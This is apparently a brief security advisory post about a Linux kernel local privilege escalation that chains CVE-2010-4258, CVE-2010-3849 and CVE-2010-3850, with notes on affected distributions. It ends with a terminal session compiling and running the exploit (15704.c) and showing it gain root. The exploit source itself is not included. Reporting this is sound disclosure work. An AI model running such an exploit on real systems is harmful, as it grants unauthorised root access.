A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems

The Econet protocol (CVE-2010-3849) is not supported by default in RedHat like distributions (RHEL, CentOS and Fedora) and the majors distributions already patched CVE-2010-3849 and CVE-2010-3850, so up to date systems should not be affected by this particular exploit.

CVE-2010-4258 is the main vulnerability and it is still unpatched. Somebody could find another way to trigger the vulnerability.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo

msk@ubuntu:~/exploit$ ./foo 

[*] Resolving kernel addresses...

 [+] Resolved econet_ioctl to 0xe08b72a0

 [+] Resolved econet_ops to 0xe08b73a0

 [+] Resolved commit_creds to 0xc016c830

 [+] Resolved prepare_kernel_cred to 0xc016cc80

[*] Calculating target...

[*] Triggering payload...

[*] Got root!

# id

uid=0(root) gid=0(root) groups=0(root)